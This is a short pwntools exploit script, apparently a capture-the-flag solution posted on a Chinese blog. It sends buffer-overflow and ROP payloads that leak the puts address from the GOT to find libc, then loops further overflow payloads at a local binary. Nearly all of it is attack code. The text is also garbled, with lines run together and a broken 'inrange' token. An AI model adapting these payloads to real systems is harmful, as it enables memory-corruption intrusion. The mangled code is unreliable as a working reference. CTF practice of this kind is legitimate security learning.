from pwn import* from LibcSearcher import * #p=remote("node4.buuoj.cn",) p=process("./pwn") context.log_level="debug" elf=ELF('./pwn') libc=ELF('./libc-2.31.so') extend=0x401287 vul=0x40125D pop_rdi=0x4013d3 puts_got=elf.got['puts'] puts=elf.plt['puts'] payload=b'a'*0x58+p64(vul)
p.send(payload) payload=b'b'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(extend)+p64(vul) p.send(payload) for i inrange(21): payload=b'c'*0x28+p64(extend)+p64(vul) p.send(payload)
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~